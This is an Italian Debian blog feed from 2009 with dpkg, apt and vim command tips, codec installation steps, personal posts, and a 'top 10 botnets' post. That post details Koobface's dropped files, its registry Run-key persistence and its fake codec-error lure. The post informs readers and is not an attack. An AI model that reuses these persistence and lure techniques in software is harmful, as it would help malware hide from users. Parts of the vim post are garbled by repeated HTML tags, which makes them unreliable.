/>Presenta tramite interfaccia tutti i programmi che hanno utilizzato debconf e consente di riconfigurarli<br />(invece di scrivere a mano dpkg-reconfigure nomepacchetto che costa troppa fatica) <br />Eliminare dipendenze inutilizzate:<br />$ apt-get install deborphan $ orphaner –purge <br />Forzare disinstallazione:<br />Se i pacchetti non si vogliono disinstallare dal sistema perche non ufficiali o testing restituiscono il codice errore 1 non facendo aggiornare il sistema. in questo caso: $ dpkg –purge –force-all pacchetto Se non si risolve, editate /var/lib/dpkg/status cancellando le informazioni sul pacchetto.<br />Usate anche deborphan per ripulire tutto.<br /><br />Comandi utili DPKG: Controllare la presenza di un pacchetto installato sul sistema:<br />$ dpkg -l|grep pacchetto <br />Listare i singoli file che compongono un pacchetto già installato:<br />$ dpkg -L pacchetto <br />Riconfigurazione X server:<br />X.Org<br />$ dpkg-reconfigure xserver-xorg XFree<br />$ dpkg-reconfigure xserver-xfree86 <br />Riconfigurare il layout della tastiera:<br />$ dpkg-reconfigure console-data Impostare <br />la lingua alla tastiera:<br />$ dpkg-reconfigure locales Scegliere it_IT@euro<br />Copiare la propria configurazione dei pacchetti su un altro sistema:<br />$ dpkg –get-selections “*” > lista.txt Copiate il file lista.txt sull’altro PC e scrivete:<br />$ dselect update<br />$ dpkg –set-selections < lista.txt<br />$ apt-get -u dselect-upgrade <br />Eliminare i residui dei file di configurazione dei pacchetti -rc:<br />$ dpkg –purge `COLUMNS=300 dpkg -l “*” | egrep “^rc” | cut -d\ -f3`<br /><br />by Friend of debianclan.org<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3466264784683765066?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-85618107220692522732009-09-10T05:17:00.000-07:002009-09-10T07:28:13.400-07:00w32codecs questo è un pacchetto di codecs necessario per vedere diversi formati, come Divx. (disponible. Maintainer: MirSPCM)<br /><br />libdvdcss è una libreria portabile per accedere ai DVD con sistema CSS. Fa parte del VideoLan project ed è usato da VLC e tutti gli altri DVD player open source come Ogle, xine-based players e MPlayer<br /><br />Installare w32codecs in Debian<br /><br />#wget http://www.debian-multimedia.org/pool/main/w/w32codecs/w32codecs_20060611-0.0_i386.deb<br /><br />#dpkg -i w32codecs_20060611-0.0_i386.deb<br /><br />Installare liddvdcss2 in Debian<br /><br />#wget http://www.debian-multimedia.org/pool/main/libd/libdvdcss/libdvdcss2_1.2.9-0sarge0.0_i386.deb<br /><br />#dpkg -i libdvdcss2_1.2.9-0sarge0.0_i386.deb<br /><br />Puoi guardare la lista qua<br />http://www.debian-multimedia.org/pool/main/libd/libdvdcss/<br /><br />e scaricare tutto quello che ti serve sempre qua http://www.debian-multimedia.org/pool/main/<br /><br />oppure per inserire tutto nei repository <br />basta aggiungere questo a /etc/apt/source.list<br /><br />Se usi Debian Sid:<br />deb http://www.debian-multimedia.org sid main<br /><br />Se usi Debian Lenny:<br />deb http://www.debian-multimedia.org lenny main<br /><br />dopodichè<br />date<br /><br />#apt-get update<br />#apt-get install w32codecs libdvdcss2<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-8561810722069252273?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-61233587382964883592009-09-10T03:20:00.000-07:002009-09-10T05:15:49.930-07:00Da dove viene il nome gREp (RE sta per Regular Expression):<br />:g/RE/p<br /><br />Cancella linee da 10 a 20 inclusive:<br />:10,20d<br />o con marchi a e b:<br />:'a,'bd<br /><br />Cancella lineee che contengono pattern:<br />:g/pattern/d<br /><br />Cancella tutte le linee vuote:<br />:g/^$/d<br /><br />Cancella linee in un range dato che contengono pattern:<br />:20,30/pattern/d<br />or with marks a and b:<br />:'a,'b/pattern/d<br /><br />Sostituisce tutte le linee alla prima volta che incontra of pattern:<br />:%s/pattern/new/<br />:1,$s/pattern/new/<br /><br />Sostituisce tutte le linee di pattern globalmente<br />(anche se ce ne sono più di una sulla stessa linea):<br />:%s/pattern/new/g<br />:1,$s/pattern/new/g<br /><br />Trova tutte le linee che contengono pattern e ci aggiunge -new alla fine di ogni linea:<br />:%s/\(.*pattern.*\)/\1-new/g<br /><br />Sostituzione di un range:<br />:20,30s/pattern/new/g<br />con a e b:<br />:'a,'bs/pattern/new/g<br /><br />Inverte due patterns su una linea:<br />:s/\(pattern1\)\(pattern2\)/\2\1/<br /><br />Scrive in maiuscolo la prima lettera in minuscolo su una linea:<br />:s/\([a-z]\)/\u\1/<br />più concisamente:<br />:s/[a-z]/\u&amp;/<br /><br />Mette in maiuscolo tutte le minuscole di una linea:<br />:s/\([a-z]\)/\u\1/g<br />più concisamente:<br />:s/[a-z]/\u&amp;/g<br /><br />Capitalizza tutte le parole su una linea:<br />:s/\(.*\)/\U\1\E/<br /><br />Capitalizza tutte le prime lettere delle parole in una linea:<br />:s/\<[a-z]/\u&amp;/g <br />Toglie la capitalizzazione di tutte le prime lettere delle parole in una linea: :s/\<[A-Z]/\l&amp;/g<br /><br />Cambia la grandezza dei caratteri sotto al cursore:<br /> ~ <br />Cambia la grandezza di tutti i caratteri su una linea:<br /> g~~ <br />Cambia la grandezza di tutti i caratteri rimanenti dal cursore:<br /> g~w<br /><br /> Incrementa il numero sotto al cursore: <span style="font-weight: bold;"><br /><</span>Ctrl<span style="font-weight: bold;">-</span>L<span style="font-weight: bold;">></span><br /><ctrl-a><ctrl-a><br />Decrementa il numero sotto al cursore:<br /><ctrl-x></ctrl-x></ctrl-a></ctrl-a><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span>X<span style="font-weight: bold;">></span><br /><ctrl-a><ctrl-a><ctrl-x><br /><ctrl-a><ctrl-x>Riscrive:<br /></ctrl-x></ctrl-a></ctrl-x></ctrl-a></ctrl-a><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">L</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-l><br /><br /></ctrl-l><ctrl-a><ctrl-x><ctrl-l>Accende la numerazione delle linee:<br />:set nu<br />La spegne:<br />:set nonu<br /><br />Numero Linee (filtra il file attraverso un comando unix e riscrive l output):<br />:%!cat -n<br /><br />Ordina linee di testo:<br />:%!sort<br /><br />Ordina linee di testo e rimuove linee indentiche in file ordinati:<br />:%!sort -u<br /><br />Legge l'output di un comando nel buffer:<br />:r !ls -l<br /><br />Aggiorna un file dalla versione sul disco:<br />:e!<br /><br />Apre una nuova finestra:<br /><ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w>n<br /><br />Apre una nuova finestra dello stesso file (split):<br /><ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w><ctrl-w>s<br /><br />Split la finestra verticalmente:<br /><ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w><ctrl-w><ctrl-w>v<br /><br />Chiude la finestra corrente:<br /><ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w><ctrl-w><ctrl-w><ctrl-w>c<br />:q<br /><br />Fa della finestra corrente l'unica finestra:<br /><ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w>o<br /><br />Cicla alla finestra seguente:<br /><ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w>w<br /><br />Muove la finestra sotto quella corrente:<br /><ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w>j<br /><br />Muove la finestra sopra quella corrente:<br /><ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w>k<br /><br />Muove la finestra a sinistra di quella corrente:<br /><ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w>h<br /><br />Muove la finestra a destra quella corrente:<br /><ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><span style="font-weight: bold;"><</span>Ctrl<span style="font-weight: bold;">-</span><span style="font-weight: bold;">w</span><span style="font-weight: bold;">></span><ctrl-l><ctrl-x><ctrl-a><ctrl-x><ctrl-l><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w><ctrl-w>l<br /><br />Setta la dimensione del testo per l'allineamento automatico mentre scrivi:<br />:set textwidth=80<br /><br />Accende l'evidenziamento della sintassi<br />:syn on<br />Spegne:<br />:syn off<br /><br />Forza il tipo di file per l'evidenziamento della sintassi:<br />:set filetype=python<br />:set filetype=c<br />:set filetype=php<br /><br />Usa colori chiari per uno sfondo scuro:<br />:set background=dark<br /><br /><br />Htmlize un file usando l'evidenziamento corrente della sintassi:<br />:so $VIMRUNTIME/syntax/2html.vim<br /><br />O, htmlize da un comando di promt:<br />in 2html.sh scrivi:<br /><br />#!/bin/sh<br />vim -n -c ':so $VIMRUNTIME/syntax/2html.vim' -c ':wqa' $1 > /dev/null 2> /dev/null<br /><br />Adesso basta fare: shell> 2html.sh foo.py</ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-w></ctrl-l></ctrl-x></ctrl-a></ctrl-x></ctrl-l><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6123358738296488359?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-48157159540112326842009-09-01T09:16:00.000-07:002009-09-01T10:53:30.662-07:00Per quelle poche persone che non lo sanno Ubuntu è distribuito dalla canonical company ed è praticamente quasi tutto preso da Debian Sid (la versione instabile) più qualche applicazione e modificazione. Debian è una delle distribuzioni più riuscite ed è basato esclusivamente sul lavoro della community che ci sta dietro<br /><br /><br />1) Stabilità e Sicurezza<br />Debian rilascia le distribuzioni stabili dopo tanto tempo, perchè ci tiene che siano veramente stabili e che abbiano passato infiniti test sulla sicurezza.<br />Non c'è da stupirsi se la maggior parte dei siti usa Debian come server. Sicuramente Ubuntu si sta cominciando a conoscerlo, ma gia adesso molte persone preferisco usare Debian visto che Ubuntu ci mette troppo tempo ad aggiustare le sue falle. Con Debian si può lavorare estramente bene e se vuoi le cose più nuove perdendo un pè nelle varie fasi di testing puoi sempre installare la versione di testing o la experimental e avrai i programmi sempre aggiornati.<br /><br />2) Esclusivamente Software Free<br /><br />Debian aderisce strettamente alla filosofia del free software. è composto esclusivamente da software free, persino Firefox è stato rinominato in Iceweasel perchè la parte artistica era soggetta a copyright.<br /><br />3) Per le architetture particolari del computer<br /><br />Debian ora funziona su 11 differenti architetture e queste sono sempre in aggiornamento, cosi sarai sicuro di avere qualcosa appositamente studiato per il tuo computer. Le architetture supportate sono x86-32, x86-64, PowerPC, SPARC, DEC Alpha, ARM, MIPS, HPPA, S390, IA-64.<br /><br />4) Se non ti piaciono le aziende<br /><br />Canonical è una azienda. Non so voi ma io non mi fido delle aziende, anche se sono esclusivamente uno sponsor. Debian è supportata dalla propria community e dalla Free software foundation.<br /><br />5) Semplice<br /><br />Nella Disto di Debian Standard, hai tutto quello di cui hai bisogno per cominciare ed è completamente configurabile, nessun plugin inutile, soltanto Debian!<br /><br />Cosa preferisci? Debian o Ubuntu<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-4815715954011232684?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com3tag:blogger.com,1999:blog-2454834713612225354.post-21835716026816028092009-09-01T08:09:00.000-07:002009-09-01T14:39:18.424-07:00Potete scaricare da qui <a href="https://www.getdropbox.com/referrals/NTE4ODYwNTg5">dropbox</a> non-free per debian !<br />funzionante<br /><br />l unica cosa che dovete fare è<br />dpkg -i nautilus-dropbox_0.6.1-1_i386.deb<br /><br />nella cartella dove avrete scaricato il pacchetto deb<br /><br /><a href="http://dl.getdropbox.com/u/1886058/nautilus-dropbox_0.6.1-1_i386.deb">nautilus-dropbox_0.6.1-1_i386.deb</a><br /><br />non sapete cos'è drop-box !?!<br /><br /><a href="https://www.getdropbox.com/referrals/NTE4ODYwNTg5">Dropbox</a> è un programma che sincronizza i tuoi files online tra più computer contemporaneamente.<br /><br /><a href="https://www.getdropbox.com/referrals/NTE4ODYwNTg5">dropbox.com</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-2183571602681602809?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-77246410376901129812009-08-20T08:31:00.000-07:002009-08-20T08:35:49.904-07:00anche se in ritardo mando i miei auguri a Debian !<br /><br />tutto ebbe inizio da <a href="http://groups.google.com/group/comp.os.linux.development/msg/a32d4e2ef3bcdcc6?pli=1">qui</a><br /><br />io il 16 stavo in nave per tornare ad athene da skyros e quindi non ho potuto organizzare nulla per festeggiare i 16 anni di Debian...<br /><br />ho visto cmq che alcuni si sono organizzati<br /><a href="http://wiki.debian.org/DebianDay2009">http://wiki.debian.org/DebianDay2009<br /></a><br />spero di organizzare pure io qualcosa l anno prossimo<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7724641037690112981?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-39322596956924150302009-08-20T07:25:00.000-07:002009-08-20T07:39:34.498-07:00package utile per convertire i brush abr di photoshop in brush per gimp<br />potete scaricarlo da qui :)<br /><a href="http://packages.debian.org/unstable/main/abr2gbr">abr2gbr</a><br /><br />al momento sono tornata a roma ma qui si muore di caldo e il peggio è l'alta umidità<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3932259695692415030?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-90412120571140349342009-08-15T06:38:00.000-07:002009-08-15T06:39:33.975-07:00sto cercando lavoro in giappone al momento.<br />se qualcuno ne sa qualcosa sono ben contenta di saperne di più.<br />a presto<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-9041212057114034934?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-61546421507129637802009-08-10T01:34:00.000-07:002009-08-10T01:38:32.458-07:00sono nella piazza centrale connessa su un ssid <hidden><br />qua il paesaggio è fantastico purtroppo non ho dietro una macchina fotografica<br />si sta benissimo anche se c'è sempre vento<br />sto soggiornando in una casa tradizionale di skyros che naturalmente manca di qualsiasi connessione al mondo.<br />a presto :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6154642150712963780?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-43077354512155681972009-07-29T16:20:00.000-07:002009-07-31T18:38:11.601-07:00<a href="http://qa.debian.org/developer.php?login=aliceinwire@gnumerica.org">my first package </a><br /><br />thanks marga for make it possible :)<br /><br />domani parto per skyros<br />quindi per un pò probabilmente non ci saranno nuove guide e/o update<br />sperando che ci sia il wifi<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-4307735451215568197?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com1tag:blogger.com,1999:blog-2454834713612225354.post-52822665889722308552009-07-25T11:44:00.001-07:002009-07-28T06:30:08.200-07:00I QR code sono dei codici matrix formati da due barcode sovrapposti (bidimensionali) inventati dalla azienda giapponese Denso-Wave nel 1994. QR è l abbreviativo di "quick response" perchè i creatori intendono che il codice possa venire decifrato ad alta velocità.<br />In Giappone hanno avuto sicuramente un grandissimo successo e sono molto conosciuti tra l altro hanno anche creato dei programmi per i cellulari che possono decifrare questi codici con l'utilizzo della fotocamera.<br />essendo le persone in giappone molto pigre (ma non solo in giappone) piuttosto di dire il proprio indirizzo email e poi l altro deve scriverlo sul suo cellulare.<br />gli basta mostrare il proprio biglietto da visita (famosissimi in giappone ) con sopra l apposito QR code.<br />utilissimi anche nei supermercati al posto dei normali codici a barre!!!<br />Lo standard giapponese per i codici QR, <a href="http://it.wikipedia.org/wiki/Japanese_Industrial_Standards" title="Japanese Industrial Standards">JIS</a> X 0510, è stato rilasciato nel gennaio del 1999 e un corrispondente Standard Internazionale <a href="http://it.wikipedia.org/wiki/ISO" title="ISO">ISO</a>, ISO/IEC 18004, è stato approvato nel giugno del 2000.<br /><br />questo è il sito in inglese della denso wave <a href="http://www.denso-wave.com/qrcode/index-e.html">http://www.denso-wave.com/qrcode/index-e.html</a><br /><br />qua potrete creare i vostri personali qr code<br /><a href="http://qrcode.kaywa.com/">http://qrcode.kaywa.com/</a><br /><br />ad esempio questo è il QR code di Drunk Geisha<br /><br /><img alt="qrcode" src="http://qrcode.kaywa.com/img.php?s=5&amp;d=drunkgeisha.blogspot.com" /><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5282266588972230855?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com1tag:blogger.com,1999:blog-2454834713612225354.post-72936216473821251802009-07-23T10:22:00.000-07:002009-07-23T13:24:24.239-07:00Gli attacchi da botnet stanno crescendo, come il cybercrimine che usa computer compromessi per spammare, rubare data personale, aumentarsi il click rating e abbattere siti con DDos.<br />Questa è la lista delle 10 botnets più attive e più ricercate, ci basiamo sui calcoli stimati dalla firma sulla sicurezza Damballa sulla grandezza delle botnet e la loro attività negli USA.<br />La maggior parte dei criminali usa:<br /><br /><br />Zeus trojan<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmjBuU2NlkI/AAAAAAAAAO0/2UNtmX2QCxI/s1600-h/screenen1.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 106px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmjBuU2NlkI/AAAAAAAAAO0/2UNtmX2QCxI/s200/screenen1.png" alt="" id="BLOGGER_PHOTO_ID_5361748357998810690" border="0" /></a>Un programma che usa la technica del key-logging per rubare dati sensibili (come user names, passwords, numeri di account e numeri di carte di credito. inserisce false richieste di inserimento dati nelle pagine web per rubare i dati degli account delle vittime.<br /><br /><br /><br />al secondo posto: Koobface<br /><br />Computer infettati in USA : 2.9 milioni<br /><br />La maggior parte dei criminali usa questo malware distribuendolo nei vari social network come Myspace e Facebook con falsi commenti da "amici" quando un utente preme il link per vedere un video viene informato da un popup che deve scaricare un update necessario per la visualizzazione ma in reaMain crime use malware con cui l'attacante potrà controllare il vostro computer.<br /><br />Quando il virus si attiva copia se stesso in questo file:<br /><br />c:\windows\mstre6.exe<br /><br />Crea anche questo file che utilizza per creare altri programmi infetti<br /><br />c:\windows\tmark2.dat<br /><br />Crea poi la seguente stringa nel registro di sistema che fa partire tutte le volte che windows si accende:<br /><br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run\"systray" = "c:\windows\mstre6.exe"<br /><br />Il virus cancella la seguente riga dal registro:<br /><br />HKEY_CURRENT_USER\AppEvents\Schemes\Apps\Explorer\Navigating<br /><br />Quando viene eseguito per la prima volta il sistema da il seguente errore per distrarre l utente dal suo vero scopo <br /><br />Window title: Error<br />Window body: Error installing Codec. Please contact support.<br /><br />Dopo di che cerca cookies relativi a siti di social networking. se non ne trova il virus si cancella da solo.<br /><a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Zb07uqFW8vM/SmjAf2bBZUI/AAAAAAAAAOs/9Rs2UBV6Juw/s1600-h/fig2_koobface.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 160px;" src="http://3.bp.blogspot.com/_Zb07uqFW8vM/SmjAf2bBZUI/AAAAAAAAAOs/9Rs2UBV6Juw/s200/fig2_koobface.jpg" alt="" id="BLOGGER_PHOTO_ID_5361747009801905474" border="0" /></a><br />invece se trova qualcosa il virus modifica il cookie in modo da linkarsi ai siti infettabili e agisce come un finto utente per far cadere altre persone nella sua trappola facendo apparire ad altri il popup con la necessità di installare un video codec.<br /><br /><br /><br />Al terzo posto 3: TidServ<br /><br />computer infettati in USA: 1.5 milioni<br /><br />Questo invece è un trojan downloader spesso viene inviato attraverso le mail di spam come un allegato e a differenza degli altri non prende direttamente controllo del pc ma scarica dalla rete un programma e usa delle tecniche chiamate RootKit per farlo avviare, senza che voi o windows si accorga di nulla, e può nascondere anche i suoi file, le stringhe che inserisce nel registro e il processo nel task manager.<br /><br />al quarto posto: Trojan.Fakeavalert<br /><br />Computer infettati in USA: 1.4 milioni<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmjCVg8QTvI/AAAAAAAAAO8/q-wDl-5IS4o/s1600-h/TrojanFakeAValert.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 75px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmjCVg8QTvI/AAAAAAAAAO8/q-wDl-5IS4o/s200/TrojanFakeAValert.jpg" alt="" id="BLOGGER_PHOTO_ID_5361749031260278514" border="0" /></a>Utilizzato per fare spamm, questa botnet serve per far scaricare altri malware, con la sua forza nei finti avvisi e richieste di installazione da parte di finti antivirus.<br /><br /><br /><br /><br />al quinto posto: TR/Dldr.Agent.JKH<br /><br />Computer infettati in USA: 1.2 milioni<br /><br />Questo è un Trojan vero e proprio con un server in locale sulla macchina della vittima e un client in remoto sulla macchina dell aggressore tutti i dati che si scambiano sono criptati e servono per eseguiri comandi che gli vengono inviati periodicamente. a volte è assieme a qualche altro malware ed è usato come clickbot, manda falsi click a degli adsense dell aggressore per fargli incrementare i suoi guadagni attraverso una attività costante e creata apposta per non dare sospetti.<br /><br />al sesto posto: Monkif<br /><br />Computer infettati in USA: 520,000<br /><br />La sua funzione principale consiste nel far scaricare un adware BHO (browser helper object) in un sistema infettato.<br /><br />al settimo posto: Hamweq<br /><br />Computer infettati in USA: 480,000<br /><br />Anche chiamato come IRCBrute, o autorun worm, questa backdoor clona se stessa su ogni sistema infettabile (tutti quelli della micro$oft) per poi copiarsi in ogni sistema di memoria esterno come penne usb (cmq funziona solo su sistemi micro$oft) e ricopiarsi tutte le volte che si ha l'accesso a un sistema romovibile, si esegue in automatico. è effetivamente un efficente sistema di distribuzione, Hamweq crea delle stringhe nel registro per abilitare la sua esecuzione automatica e auto iniettarsi in explorer.exe, L'aggressore può usarlo per fargli eseguire comandi in remoto o riceve informazioni dal sistema infetto facendovi credere che stia facendo le solite funzioni di routine.<br /><br />al ottavo posto: Swizzor<br /><br />Computer infettati in USA: 370,000<br /><br />Una variante del Lop Malware, questo trojan dropper può scaricare e avviare file da internet sull sistema infettato senza che l utente ne sia a conoscenza, installare programmi adware e altri trojan.<br /><br />al nono posto: Gammima<br /><br />Computer infettati in USA: 230,000<br /><br />Conosciuto anche come Gamina, Gamania, Frethog, Vaklik e Krap, questo programma principalmente ruba gli accunt di accesso di giochi su internet. utilizza anchesso rootkit per caricare autoeseguirsi o per cammuffarsi come altri processi comuni (per esempio explorer.exe) e si diffonde attraverso dischi rimovibili. è molto conosciuto anche per essere penetrato nella stazione spaziale internazionale nell'estate del 2008.<br /><br />infine: Conficker<br /><br />Computer infettati in USA: 210,000<br /><br />Chiamato anche Downadup, questo downloader si è molto diffuso nel mondo, non molto però negli stati uniti. è un downloader complesso utilizzato come tramite per altri malware. è stato usato per vendere programmi antivirus fasulli, questo virus comunque sembra non avere altri obiettivi se non quello di propagarsi.Il mondo commerciale teme che possa modificarsi con scopi più dannosi.<br />un altra funzione di conficker è quella <span class="searchlite">di aprire porte a caso tra la 1024 e la 10000 e cercare di exploitare la vulnerabilità del MS08-067 negli altri pc della rete per propagarsi</span>.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7293621647382125180?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-57929256246470573822009-07-23T06:42:00.000-07:002009-07-23T06:56:44.828-07:00<img alt="http://ecx.images-amazon.com/images/I/41P3MATW8VL._SL500_AA240_.jpg" src="http://ecx.images-amazon.com/images/I/41P3MATW8VL._SL500_AA240_.jpg" /><br /><br /><a href="http://www.youtube.com/view_play_list?p=418D84DE1E3FA21B&amp;search_query=cyberia+mix">cyberia mix</a><br /><br />potete anche scaricarla da qui<br /><a href="http://www.jelo-maniac.net/jmdd/lanzamientos/musica/anime/serial%20experiments%20lain/%5BJelo-Maniac%5D_HIBIKi_SOUND_FACTORY_-_Serial_Experiment_Lain_Soundtrack_Cyberia_Mix_%5BMP3@320ABR%5D%5BD9E72920%5D.zip">Enjoy~</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5792925624647057382?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com1tag:blogger.com,1999:blog-2454834713612225354.post-69543267246972617042009-07-22T23:38:00.000-07:002009-07-22T23:41:30.926-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmgF0FACSQI/AAAAAAAAAN4/xzQJdAc8zFs/s1600-h/alicedebian.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 117px;" 